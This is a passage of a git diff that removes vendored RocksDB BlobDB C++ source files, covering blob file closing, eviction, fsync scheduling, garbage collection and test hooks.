-    auto bfile = bfile_pair.second;
-    ROCKS_LOG_INFO(
-        db_options_.info_log,
-        "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64,
-        bfile->PathName().c_str(), bfile->GetFileSize(), bfile->BlobCount(),
-        bfile->deleted_count_, bfile->deleted_size_,
-        (bfile->expiration_range_.second - epoch_now));
-  }
-
-  // reschedule
-  return std::make_pair(true, -1);
-}
-
-Status BlobDBImpl::CloseBlobFile(std::shared_ptr<BlobFile> bfile) {
-  assert(bfile != nullptr);
-  Status s;
-  ROCKS_LOG_INFO(db_options_.info_log, "Close blob file %" PRIu64,
-                 bfile->BlobFileNumber());
-  {
-    WriteLock wl(&mutex_);
-
-    if (bfile->HasTTL()) {
-      size_t erased __attribute__((__unused__));
-      erased = open_ttl_files_.erase(bfile);
-      assert(erased == 1);
-    } else {
-      assert(bfile == open_non_ttl_file_);
-      open_non_ttl_file_ = nullptr;
-    }
-  }
-
-  if (!bfile->closed_.load()) {
-    WriteLock lockbfile_w(&bfile->mutex_);
-    s = bfile->WriteFooterAndCloseLocked();
-  }
-
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failed to close blob file %" PRIu64 "with error: %s",
-                    bfile->BlobFileNumber(), s.ToString().c_str());
-  }
-
-  return s;
-}
-
-Status BlobDBImpl::CloseBlobFileIfNeeded(std::shared_ptr<BlobFile>& bfile) {
-  // atomic read
-  if (bfile->GetFileSize() < bdb_options_.blob_file_size) {
-    return Status::OK();
-  }
-  return CloseBlobFile(bfile);
-}
-
-bool BlobDBImpl::VisibleToActiveSnapshot(
-    const std::shared_ptr<BlobFile>& bfile) {
-  assert(bfile->Obsolete());
-  SequenceNumber first_sequence = bfile->GetSequenceRange().first;
-  SequenceNumber obsolete_sequence = bfile->GetObsoleteSequence();
-  return db_impl_->HasActiveSnapshotInRange(first_sequence, obsolete_sequence);
-}
-
-bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size,
-                                       uint64_t blob_offset,
-                                       uint64_t blob_size) {
-  assert(bdb_options_.enable_garbage_collection);
-  (void)blob_offset;
-  std::shared_ptr<BlobFile> bfile;
-  {
-    ReadLock rl(&mutex_);
-    auto hitr = blob_files_.find(file_number);
-
-    // file was deleted
-    if (hitr == blob_files_.end()) {
-      return false;
-    }
-
-    bfile = hitr->second;
-  }
-
-  WriteLock lockbfile_w(&bfile->mutex_);
-
-  bfile->deleted_count_++;
-  bfile->deleted_size_ += key_size + blob_size + BlobLogRecord::kHeaderSize;
-  return true;
-}
-
-bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) {
-  assert(bdb_options_.enable_garbage_collection);
-  BlobIndex blob_index;
-  Status s = blob_index.DecodeFrom(index_entry);
-  if (!s.ok()) {
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Could not parse lsm val in MarkBlobDeleted %s",
-                   index_entry.ToString().c_str());
-    return false;
-  }
-  bool succ = FindFileAndEvictABlob(blob_index.file_number(), key.size(),
-                                    blob_index.offset(), blob_index.size());
-  return succ;
-}
-
-std::pair<bool, int64_t> BlobDBImpl::EvictCompacted(bool aborted) {
-  assert(bdb_options_.enable_garbage_collection);
-  if (aborted) return std::make_pair(false, -1);
-
-  override_packet_t packet;
-  size_t total_vals = 0;
-  size_t mark_evicted = 0;
-  while (override_vals_q_.dequeue(&packet)) {
-    bool succeeded =
-        FindFileAndEvictABlob(packet.file_number_, packet.key_size_,
-                              packet.blob_offset_, packet.blob_size_);
-    total_vals++;
-    if (succeeded) {
-      mark_evicted++;
-    }
-  }
-  ROCKS_LOG_INFO(db_options_.info_log,
-                 "Mark %" ROCKSDB_PRIszt
-                 " values to evict, out of %" ROCKSDB_PRIszt
-                 " compacted values.",
-                 mark_evicted, total_vals);
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::EvictDeletions(bool aborted) {
-  assert(bdb_options_.enable_garbage_collection);
-  if (aborted) return std::make_pair(false, -1);
-
-  ColumnFamilyHandle* last_cfh = nullptr;
-  Options last_op;
-
-  Arena arena;
-  ScopedArenaIterator iter;
-
-  // we will use same RangeDelAggregator for all cf's.
-  // essentially we do not support Range Deletes now
-  std::unique_ptr<RangeDelAggregator> range_del_agg;
-  delete_packet_t dpacket;
-  while (delete_keys_q_.dequeue(&dpacket)) {
-    if (last_cfh != dpacket.cfh_) {
-      if (!range_del_agg) {
-        auto cfhi = reinterpret_cast<ColumnFamilyHandleImpl*>(dpacket.cfh_);
-        auto cfd = cfhi->cfd();
-        range_del_agg.reset(new RangeDelAggregator(cfd->internal_comparator(),
-                                                   kMaxSequenceNumber));
-      }
-
-      // this can be expensive
-      last_cfh = dpacket.cfh_;
-      last_op = db_impl_->GetOptions(last_cfh);
-      iter.set(db_impl_->NewInternalIterator(&arena, range_del_agg.get(),
-                                             dpacket.cfh_));
-      // this will not work for multiple CF's.
-    }
-
-    Slice user_key(dpacket.key_);
-    InternalKey target(user_key, dpacket.dsn_, kTypeValue);
-
-    Slice eslice = target.Encode();
-    iter->Seek(eslice);
-
-    if (!iter->status().ok()) {
-      ROCKS_LOG_INFO(db_options_.info_log, "Invalid iterator seek %s",
-                     dpacket.key_.c_str());
-      continue;
-    }
-
-    const Comparator* bwc = BytewiseComparator();
-    while (iter->Valid()) {
-      if (!bwc->Equal(ExtractUserKey(iter->key()), ExtractUserKey(eslice)))
-        break;
-
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      if (!ParseInternalKey(iter->key(), &ikey)) {
-        continue;
-      }
-
-      // once you hit a DELETE, assume the keys below have been
-      // processed previously
-      if (ikey.type == kTypeDeletion || ikey.type == kTypeSingleDeletion) break;
-
-      Slice val = iter->value();
-      MarkBlobDeleted(ikey.user_key, val);
-
-      iter->Next();
-    }
-  }
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::CheckSeqFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  std::vector<std::shared_ptr<BlobFile>> process_files;
-  {
-    uint64_t epoch_now = EpochNow();
-
-    ReadLock rl(&mutex_);
-    for (auto bfile : open_ttl_files_) {
-      {
-        ReadLock lockbfile_r(&bfile->mutex_);
-
-        if (bfile->expiration_range_.second > epoch_now) continue;
-        process_files.push_back(bfile);
-      }
-    }
-  }
-
-  for (auto bfile : process_files) {
-    CloseBlobFile(bfile);
-  }
-
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::FsyncFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  MutexLock l(&write_mutex_);
-
-  std::vector<std::shared_ptr<BlobFile>> process_files;
-  {
-    ReadLock rl(&mutex_);
-    for (auto fitr : open_ttl_files_) {
-      if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync))
-        process_files.push_back(fitr);
-    }
-
-    if (open_non_ttl_file_ != nullptr &&
-        open_non_ttl_file_->NeedsFsync(true, bdb_options_.bytes_per_sync)) {
-      process_files.push_back(open_non_ttl_file_);
-    }
-  }
-
-  for (auto fitr : process_files) {
-    if (fitr->NeedsFsync(true, bdb_options_.bytes_per_sync)) fitr->Fsync();
-  }
-
-  bool expected = true;
-  if (dir_change_.compare_exchange_weak(expected, false)) dir_ent_->Fsync();
-
-  return std::make_pair(true, -1);
-}
-
-std::pair<bool, int64_t> BlobDBImpl::ReclaimOpenFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  if (open_file_count_.load() < kOpenFilesTrigger) {
-    return std::make_pair(true, -1);
-  }
-
-  // in the future, we should sort by last_access_
-  // instead of closing every file
-  ReadLock rl(&mutex_);
-  for (auto const& ent : blob_files_) {
-    auto bfile = ent.second;
-    if (bfile->last_access_.load() == -1) continue;
-
-    WriteLock lockbfile_w(&bfile->mutex_);
-    CloseRandomAccessLocked(bfile);
-  }
-
-  return std::make_pair(true, -1);
-}
-
-// TODO(yiwu): correct the stats and expose it.
-std::pair<bool, int64_t> BlobDBImpl::WaStats(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  WriteLock wl(&mutex_);
-
-  if (all_periods_write_.size() >= kWriteAmplificationStatsPeriods) {
-    total_periods_write_ -= (*all_periods_write_.begin());
-    total_periods_ampl_ = (*all_periods_ampl_.begin());
-
-    all_periods_write_.pop_front();
-    all_periods_ampl_.pop_front();
-  }
-
-  uint64_t val1 = last_period_write_.load();
-  uint64_t val2 = last_period_ampl_.load();
-
-  all_periods_write_.push_back(val1);
-  all_periods_ampl_.push_back(val2);
-
-  last_period_write_ = 0;
-  last_period_ampl_ = 0;
-
-  total_periods_write_ += val1;
-  total_periods_ampl_ += val2;
-
-  return std::make_pair(true, -1);
-}
-
-// Write callback for garbage collection to check if key has been updated
-// since last read. Similar to how OptimisticTransaction works. See inline
-// comment in GCFileAndUpdateLSM().
-class BlobDBImpl::GarbageCollectionWriteCallback : public WriteCallback {
- public:
-  GarbageCollectionWriteCallback(ColumnFamilyData* cfd, const Slice& key,
-                                 SequenceNumber upper_bound)
-      : cfd_(cfd), key_(key), upper_bound_(upper_bound) {}
-
-  virtual Status Callback(DB* db) override {
-    auto* db_impl = reinterpret_cast<DBImpl*>(db);
-    auto* sv = db_impl->GetAndRefSuperVersion(cfd_);
-    SequenceNumber latest_seq = 0;
-    bool found_record_for_key = false;
-    bool is_blob_index = false;
-    Status s = db_impl->GetLatestSequenceForKey(
-        sv, key_, false /*cache_only*/, &latest_seq, &found_record_for_key,
-        &is_blob_index);
-    db_impl->ReturnAndCleanupSuperVersion(cfd_, sv);
-    if (!s.ok() && !s.IsNotFound()) {
-      // Error.
-      assert(!s.IsBusy());
-      return s;
-    }
-    if (s.IsNotFound()) {
-      assert(!found_record_for_key);
-      return Status::Busy("Key deleted");
-    }
-    assert(found_record_for_key);
-    assert(is_blob_index);
-    if (latest_seq > upper_bound_) {
-      return Status::Busy("Key overwritten");
-    }
-    return s;
-  }
-
-  virtual bool AllowWriteBatching() override { return false; }
-
- private:
-  ColumnFamilyData* cfd_;
-  // Key to check
-  Slice key_;
-  // Upper bound of sequence number to proceed.
-  SequenceNumber upper_bound_;
-};
-
-// iterate over the blobs sequentially and check if the blob sequence number
-// is the latest. If it is the latest, preserve it, otherwise delete it
-// if it is TTL based, and the TTL has expired, then
-// we can blow the entity if the key is still the latest or the Key is not
-// found
-// WHAT HAPPENS IF THE KEY HAS BEEN OVERRIDEN. Then we can drop the blob
-// without doing anything if the earliest snapshot is not
-// referring to that sequence number, i.e. it is later than the sequence number
-// of the new key
-//
-// if it is not TTL based, then we can blow the key if the key has been
-// DELETED in the LSM
-Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr<BlobFile>& bfptr,
-                                      GCStats* gc_stats) {
-  uint64_t now = EpochNow();
-
-  std::shared_ptr<Reader> reader =
-      bfptr->OpenSequentialReader(env_, db_options_, env_options_);
-  if (!reader) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "File sequential reader could not be opened",
-                    bfptr->PathName().c_str());
-    return Status::IOError("failed to create sequential reader");
-  }
-
-  BlobLogHeader header;
-  Status s = reader->ReadHeader(&header);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(db_options_.info_log,
-                    "Failure to read header for blob-file %s",
-                    bfptr->PathName().c_str());
-    return s;
-  }
-
-  bool first_gc = bfptr->gc_once_after_open_;
-
-  auto* cfh =
-      db_impl_->GetColumnFamilyHandleUnlocked(bfptr->column_family_id());
-  auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-  auto column_family_id = cfd->GetID();
-  bool has_ttl = header.has_ttl;
-
-  // this reads the key but skips the blob
-  Reader::ReadLevel shallow = Reader::kReadHeaderKey;
-
-  bool no_relocation_ttl =
-      (has_ttl && now >= bfptr->GetExpirationRange().second);
-
-  bool no_relocation_lsmdel = false;
-  {
-    ReadLock lockbfile_r(&bfptr->mutex_);
-    no_relocation_lsmdel =
-        (bfptr->GetFileSize() ==
-         (BlobLogHeader::kSize + bfptr->deleted_size_ + BlobLogFooter::kSize));
-  }
-
-  bool no_relocation = no_relocation_ttl || no_relocation_lsmdel;
-  if (!no_relocation) {
-    // read the blob because you have to write it back to new file
-    shallow = Reader::kReadHeaderKeyBlob;
-  }
-
-  BlobLogRecord record;
-  std::shared_ptr<BlobFile> newfile;
-  std::shared_ptr<Writer> new_writer;
-  uint64_t blob_offset = 0;
-
-  while (true) {
-    assert(s.ok());
-
-    // Read the next blob record.
-    Status read_record_status =
-        reader->ReadRecord(&record, shallow, &blob_offset);
-    // Exit if we reach the end of blob file.
-    // TODO(yiwu): properly handle ReadRecord error.
-    if (!read_record_status.ok()) {
-      break;
-    }
-    gc_stats->blob_count++;
-
-    // Similar to OptimisticTransaction, we obtain latest_seq from
-    // base DB, which is guaranteed to be no smaller than the sequence of
-    // current key. We use a WriteCallback on write to check the key sequence
-    // on write. If the key sequence is larger than latest_seq, we know
-    // a new versions is inserted and the old blob can be disgard.
-    //
-    // We cannot use OptimisticTransaction because we need to pass
-    // is_blob_index flag to GetImpl.
-    SequenceNumber latest_seq = GetLatestSequenceNumber();
-    bool is_blob_index = false;
-    PinnableSlice index_entry;
-    Status get_status = db_impl_->GetImpl(
-        ReadOptions(), cfh, record.key, &index_entry, nullptr /*value_found*/,
-        &is_blob_index);
-    TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB");
-    if (!get_status.ok() && !get_status.IsNotFound()) {
-      // error
-      s = get_status;
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Error while getting index entry: %s",
-                      s.ToString().c_str());
-      break;
-    }
-    if (get_status.IsNotFound() || !is_blob_index) {
-      // Either the key is deleted or updated with a newer version whish is
-      // inlined in LSM.
-      continue;
-    }
-
-    BlobIndex blob_index;
-    s = blob_index.DecodeFrom(index_entry);
-    if (!s.ok()) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "Error while decoding index entry: %s",
-                      s.ToString().c_str());
-      break;
-    }
-    if (blob_index.file_number() != bfptr->BlobFileNumber() ||
-        blob_index.offset() != blob_offset) {
-      // Key has been overwritten. Drop the blob record.
-      continue;
-    }
-
-    GarbageCollectionWriteCallback callback(cfd, record.key, latest_seq);
-
-    // If key has expired, remove it from base DB.
-    // TODO(yiwu): Blob indexes will be remove by BlobIndexCompactionFilter.
-    // We can just drop the blob record.
-    if (no_relocation_ttl || (has_ttl && now >= record.expiration)) {
-      gc_stats->num_deletes++;
-      gc_stats->deleted_size += record.value_size;
-      TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete");
-      WriteBatch delete_batch;
-      Status delete_status = delete_batch.Delete(record.key);
-      if (delete_status.ok()) {
-        delete_status = db_impl_->WriteWithCallback(WriteOptions(),
-                                                    &delete_batch, &callback);
-      }
-      if (delete_status.ok()) {
-        gc_stats->delete_succeeded++;
-      } else if (delete_status.IsBusy()) {
-        // The key is overwritten in the meanwhile. Drop the blob record.
-        gc_stats->overwritten_while_delete++;
-      } else {
-        // We hit an error.
-        s = delete_status;
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "Error while deleting expired key: %s",
-                        s.ToString().c_str());
-        break;
-      }
-      // Continue to next blob record or retry.
-      continue;
-    }
-
-    if (first_gc) {
-      // Do not relocate blob record for initial GC.
-      continue;
-    }
-
-    // Relocate the blob record to new file.
-    if (!newfile) {
-      // new file
-      std::string reason("GC of ");
-      reason += bfptr->PathName();
-      newfile = NewBlobFile(reason);
-      gc_stats->newfile = newfile;
-
-      new_writer = CheckOrCreateWriterLocked(newfile);
-      newfile->header_ = std::move(header);
-      // Can't use header beyond this point
-      newfile->header_valid_ = true;
-      newfile->file_size_ = BlobLogHeader::kSize;
-      s = new_writer->WriteHeader(newfile->header_);
-
-      if (!s.ok()) {
-        ROCKS_LOG_ERROR(db_options_.info_log,
-                        "File: %s - header writing failed",
-                        newfile->PathName().c_str());
-        break;
-      }
-
-      WriteLock wl(&mutex_);
-
-      dir_change_.store(true);
-      blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile));
-    }
-
-    gc_stats->num_relocate++;
-    std::string new_index_entry;
-
-    uint64_t new_blob_offset = 0;
-    uint64_t new_key_offset = 0;
-    // write the blob to the blob log.
-    s = new_writer->AddRecord(record.key, record.value, record.expiration,
-                              &new_key_offset, &new_blob_offset);
-
-    BlobIndex::EncodeBlob(&new_index_entry, newfile->BlobFileNumber(),
-                          new_blob_offset, record.value.size(),
-                          bdb_options_.compression);
-
-    newfile->blob_count_++;
-    newfile->file_size_ +=
-        BlobLogRecord::kHeaderSize + record.key.size() + record.value.size();
-
-    TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate");
-    WriteBatch rewrite_batch;
-    Status rewrite_status = WriteBatchInternal::PutBlobIndex(
-        &rewrite_batch, column_family_id, record.key, new_index_entry);
-    if (rewrite_status.ok()) {
-      rewrite_status = db_impl_->WriteWithCallback(WriteOptions(),
-                                                   &rewrite_batch, &callback);
-    }
-    if (rewrite_status.ok()) {
-      newfile->ExtendSequenceRange(
-          WriteBatchInternal::Sequence(&rewrite_batch));
-      gc_stats->relocate_succeeded++;
-    } else if (rewrite_status.IsBusy()) {
-      // The key is overwritten in the meanwhile. Drop the blob record.
-      gc_stats->overwritten_while_relocate++;
-    } else {
-      // We hit an error.
-      s = rewrite_status;
-      ROCKS_LOG_ERROR(db_options_.info_log, "Error while relocating key: %s",
-                      s.ToString().c_str());
-      break;
-    }
-  }  // end of ReadRecord loop
-
-  if (s.ok()) {
-    SequenceNumber obsolete_sequence =
-        newfile == nullptr ? bfptr->GetSequenceRange().second + 1
-                           : newfile->GetSequenceRange().second;
-    bfptr->MarkObsolete(obsolete_sequence);
-    if (!first_gc) {
-      WriteLock wl(&mutex_);
-      obsolete_files_.push_back(bfptr);
-    }
-  }
-
-  ROCKS_LOG_INFO(
-      db_options_.info_log,
-      "%s blob file %" PRIu64
-      ". Total blob records: %" PRIu64 ", Deletes: %" PRIu64 "/%" PRIu64
-      " succeeded, Relocates: %" PRIu64 "/%" PRIu64 " succeeded.",
-      s.ok() ? "Successfully garbage collected" : "Failed to garbage collect",
-      bfptr->BlobFileNumber(), gc_stats->blob_count, gc_stats->delete_succeeded,
-      gc_stats->num_deletes, gc_stats->relocate_succeeded,
-      gc_stats->num_relocate);
-  if (newfile != nullptr) {
-    total_blob_space_ += newfile->file_size_;
-    ROCKS_LOG_INFO(db_options_.info_log, "New blob file %" PRIu64 ".",
-                   newfile->BlobFileNumber());
-  }
-  return s;
-}
-
-// Ideally we should hold the lock during the entire function,
-// but under the asusmption that this is only called when a
-// file is Immutable, we can reduce the critical section
-bool BlobDBImpl::ShouldGCFile(std::shared_ptr<BlobFile> bfile, uint64_t now,
-                              bool is_oldest_non_ttl_file,
-                              std::string* reason) {
-  if (bfile->HasTTL()) {
-    ExpirationRange expiration_range = bfile->GetExpirationRange();
-    if (now > expiration_range.second) {
-      *reason = "entire file ttl expired";
-      return true;
-    }
-
-    if (!bfile->file_size_.load()) {
-      ROCKS_LOG_ERROR(db_options_.info_log, "Invalid file size = 0 %s",
-                      bfile->PathName().c_str());
-      *reason = "file is empty";
-      return false;
-    }
-
-    if (bfile->gc_once_after_open_.load()) {
-      return true;
-    }
-
-    if (bdb_options_.ttl_range_secs < kPartialExpirationGCRangeSecs) {
-      *reason = "has ttl but partial expiration not turned on";
-      return false;
-    }
-
-    ReadLock lockbfile_r(&bfile->mutex_);
-    bool ret = ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) >
-                kPartialExpirationPercentage);
-    if (ret) {
-      *reason = "deleted blobs beyond threshold";
-    } else {
-      *reason = "deleted blobs below threshold";
-    }
-    return ret;
-  }
-
-  // when crash happens, we lose the in-memory account of deleted blobs.
-  // we are therefore forced to do one GC to make sure delete accounting
-  // is OK
-  if (bfile->gc_once_after_open_.load()) {
-    return true;
-  }
-
-  ReadLock lockbfile_r(&bfile->mutex_);
-
-  if (bdb_options_.enable_garbage_collection) {
-    if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) >
-        kPartialExpirationPercentage) {
-      *reason = "deleted simple blobs beyond threshold";
-      return true;
-    }
-  }
-
-  // if we haven't reached limits of disk space, don't DELETE
-  if (bdb_options_.blob_dir_size == 0 ||
-      total_blob_space_.load() < bdb_options_.blob_dir_size) {
-    *reason = "disk space not exceeded";
-    return false;
-  }
-
-  if (is_oldest_non_ttl_file) {
-    *reason = "out of space and is the oldest simple blob file";
-    return true;
-  }
-  *reason = "out of space but is not the oldest simple blob file";
-  return false;
-}
-
-std::pair<bool, int64_t> BlobDBImpl::DeleteObsoleteFiles(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  {
-    ReadLock rl(&mutex_);
-    if (obsolete_files_.empty()) return std::make_pair(true, -1);
-  }
-
-  std::list<std::shared_ptr<BlobFile>> tobsolete;
-  {
-    WriteLock wl(&mutex_);
-    tobsolete.swap(obsolete_files_);
-  }
-
-  bool file_deleted = false;
-  for (auto iter = tobsolete.begin(); iter != tobsolete.end();) {
-    auto bfile = *iter;
-    {
-      ReadLock lockbfile_r(&bfile->mutex_);
-      if (VisibleToActiveSnapshot(bfile)) {
-        ROCKS_LOG_INFO(db_options_.info_log,
-                       "Could not delete file due to snapshot failure %s",
-                       bfile->PathName().c_str());
-        ++iter;
-        continue;
-      }
-    }
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "Will delete file due to snapshot success %s",
-                   bfile->PathName().c_str());
-
-    blob_files_.erase(bfile->BlobFileNumber());
-    Status s = env_->DeleteFile(bfile->PathName());
-    if (!s.ok()) {
-      ROCKS_LOG_ERROR(db_options_.info_log,
-                      "File failed to be deleted as obsolete %s",
-                      bfile->PathName().c_str());
-      ++iter;
-      continue;
-    }
-
-    file_deleted = true;
-    total_blob_space_ -= bfile->file_size_;
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "File deleted as obsolete from blob dir %s",
-                   bfile->PathName().c_str());
-
-    iter = tobsolete.erase(iter);
-  }
-
-  // directory change. Fsync
-  if (file_deleted) {
-    dir_ent_->Fsync();
-
-    // reset oldest_file_evicted flag
-    oldest_file_evicted_.store(false);
-  }
-
-  // put files back into obsolete if for some reason, delete failed
-  if (!tobsolete.empty()) {
-    WriteLock wl(&mutex_);
-    for (auto bfile : tobsolete) {
-      obsolete_files_.push_front(bfile);
-    }
-  }
-
-  return std::make_pair(!aborted, -1);
-}
-
-void BlobDBImpl::CopyBlobFiles(
-    std::vector<std::shared_ptr<BlobFile>>* bfiles_copy,
-    std::function<bool(const std::shared_ptr<BlobFile>&)> predicate) {
-  ReadLock rl(&mutex_);
-
-  for (auto const& p : blob_files_) {
-    bool pred_value = true;
-    if (predicate) {
-      pred_value = predicate(p.second);
-    }
-    if (pred_value) {
-      bfiles_copy->push_back(p.second);
-    }
-  }
-}
-
-void BlobDBImpl::FilterSubsetOfFiles(
-    const std::vector<std::shared_ptr<BlobFile>>& blob_files,
-    std::vector<std::shared_ptr<BlobFile>>* to_process, uint64_t epoch,
-    size_t files_to_collect) {
-  // 100.0 / 15.0 = 7
-  uint64_t next_epoch_increment = static_cast<uint64_t>(
-      std::ceil(100 / static_cast<double>(kGCFilePercentage)));
-  uint64_t now = EpochNow();
-
-  size_t files_processed = 0;
-  bool non_ttl_file_found = false;
-  for (auto bfile : blob_files) {
-    if (files_processed >= files_to_collect) break;
-    // if this is the first time processing the file
-    // i.e. gc_epoch == -1, process it.
-    // else process the file if its processing epoch matches
-    // the current epoch. Typically the #of epochs should be
-    // around 5-10
-    if (bfile->gc_epoch_ != -1 && (uint64_t)bfile->gc_epoch_ != epoch) {
-      continue;
-    }
-
-    files_processed++;
-    // reset the epoch
-    bfile->gc_epoch_ = epoch + next_epoch_increment;
-
-    // file has already been GC'd or is still open for append,
-    // then it should not be GC'd
-    if (bfile->Obsolete() || !bfile->Immutable()) continue;
-
-    bool is_oldest_non_ttl_file = false;
-    if (!non_ttl_file_found && !bfile->HasTTL()) {
-      is_oldest_non_ttl_file = true;
-      non_ttl_file_found = true;
-    }
-
-    std::string reason;
-    bool shouldgc = ShouldGCFile(bfile, now, is_oldest_non_ttl_file, &reason);
-    if (!shouldgc) {
-      ROCKS_LOG_DEBUG(db_options_.info_log,
-                      "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64
-                      " reason='%s'",
-                      bfile->PathName().c_str(), now,
-                      bfile->GetExpirationRange().second, reason.c_str());
-      continue;
-    }
-
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "File has been chosen for GC ttl %s %" PRIu64 " %" PRIu64
-                   " reason='%s'",
-                   bfile->PathName().c_str(), now,
-                   bfile->GetExpirationRange().second, reason.c_str());
-    to_process->push_back(bfile);
-  }
-}
-
-std::pair<bool, int64_t> BlobDBImpl::RunGC(bool aborted) {
-  if (aborted) return std::make_pair(false, -1);
-
-  current_epoch_++;
-
-  std::vector<std::shared_ptr<BlobFile>> blob_files;
-  CopyBlobFiles(&blob_files);
-
-  if (!blob_files.size()) return std::make_pair(true, -1);
-
-  // 15% of files are collected each call to space out the IO and CPU
-  // consumption.
-  size_t files_to_collect = (kGCFilePercentage * blob_files.size()) / 100;
-
-  std::vector<std::shared_ptr<BlobFile>> to_process;
-  FilterSubsetOfFiles(blob_files, &to_process, current_epoch_,
-                      files_to_collect);
-
-  for (auto bfile : to_process) {
-    GCStats gc_stats;
-    Status s = GCFileAndUpdateLSM(bfile, &gc_stats);
-    if (!s.ok()) {
-      continue;
-    }
-
-    if (bfile->gc_once_after_open_.load()) {
-      WriteLock lockbfile_w(&bfile->mutex_);
-
-      bfile->deleted_size_ = gc_stats.deleted_size;
-      bfile->deleted_count_ = gc_stats.num_deletes;
-      bfile->gc_once_after_open_ = false;
-    }
-  }
-
-  // reschedule
-  return std::make_pair(true, -1);
-}
-
-Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options) {
-  auto* cfd =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(DefaultColumnFamily())->cfd();
-  // Get a snapshot to avoid blob file get deleted between we
-  // fetch and index entry and reading from the file.
-  ManagedSnapshot* own_snapshot = nullptr;
-  const Snapshot* snapshot = read_options.snapshot;
-  if (snapshot == nullptr) {
-    own_snapshot = new ManagedSnapshot(db_);
-    snapshot = own_snapshot->snapshot();
-  }
-  auto* iter = db_impl_->NewIteratorImpl(
-      read_options, cfd, snapshot->GetSequenceNumber(),
-      true /*allow_blob*/);
-  return new BlobDBIterator(own_snapshot, iter, this);
-}
-
-Status DestroyBlobDB(const std::string& dbname, const Options& options,
-                     const BlobDBOptions& bdb_options) {
-  const ImmutableDBOptions soptions(SanitizeOptions(dbname, options));
-  Env* env = soptions.env;
-
-  Status status;
-  std::string blobdir;
-  blobdir = (bdb_options.path_relative) ? dbname + "/" + bdb_options.blob_dir
-                                        : bdb_options.blob_dir;
-
-  std::vector<std::string> filenames;
-  env->GetChildren(blobdir, &filenames);
-
-  for (const auto& f : filenames) {
-    uint64_t number;
-    FileType type;
-    if (ParseFileName(f, &number, &type) && type == kBlobFile) {
-      Status del = env->DeleteFile(blobdir + "/" + f);
-      if (status.ok() && !del.ok()) {
-        status = del;
-      }
-    }
-  }
-  env->DeleteDir(blobdir);
-
-  Status destroy = DestroyDB(dbname, options);
-  if (status.ok() && !destroy.ok()) {
-    status = destroy;
-  }
-
-  return status;
-}
-
-#ifndef NDEBUG
-Status BlobDBImpl::TEST_GetBlobValue(const Slice& key, const Slice& index_entry,
-                                     PinnableSlice* value) {
-  return GetBlobValue(key, index_entry, value);
-}
-
-std::vector<std::shared_ptr<BlobFile>> BlobDBImpl::TEST_GetBlobFiles() const {
-  ReadLock l(&mutex_);
-  std::vector<std::shared_ptr<BlobFile>> blob_files;
-  for (auto& p : blob_files_) {
-    blob_files.emplace_back(p.second);
-  }
-  return blob_files;
-}
-
-std::vector<std::shared_ptr<BlobFile>> BlobDBImpl::TEST_GetObsoleteFiles()
-    const {
-  ReadLock l(&mutex_);
-  std::vector<std::shared_ptr<BlobFile>> obsolete_files;
-  for (auto& bfile : obsolete_files_) {
-    obsolete_files.emplace_back(bfile);
-  }
-  return obsolete_files;
-}
-
-void BlobDBImpl::TEST_DeleteObsoleteFiles() {
-  DeleteObsoleteFiles(false /*abort*/);
-}
-
-Status BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr<BlobFile>& bfile) {
-  return CloseBlobFile(bfile);
-}
-
-Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr<BlobFile>& bfile,
-                                           GCStats* gc_stats) {
-  return GCFileAndUpdateLSM(bfile, gc_stats);
-}
-
-void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); }
-#endif  //  !NDEBUG
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.h b/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.h
deleted file mode 100644
index 9881107..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_db_impl.h
+++ /dev/null
@@ -1,546 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <condition_variable>
-#include <limits>
-#include <list>
-#include <memory>
-#include <set>
-#include <string>
-#include <thread>
-#include <unordered_map>
-#include <utility>
-#include <vector>
-
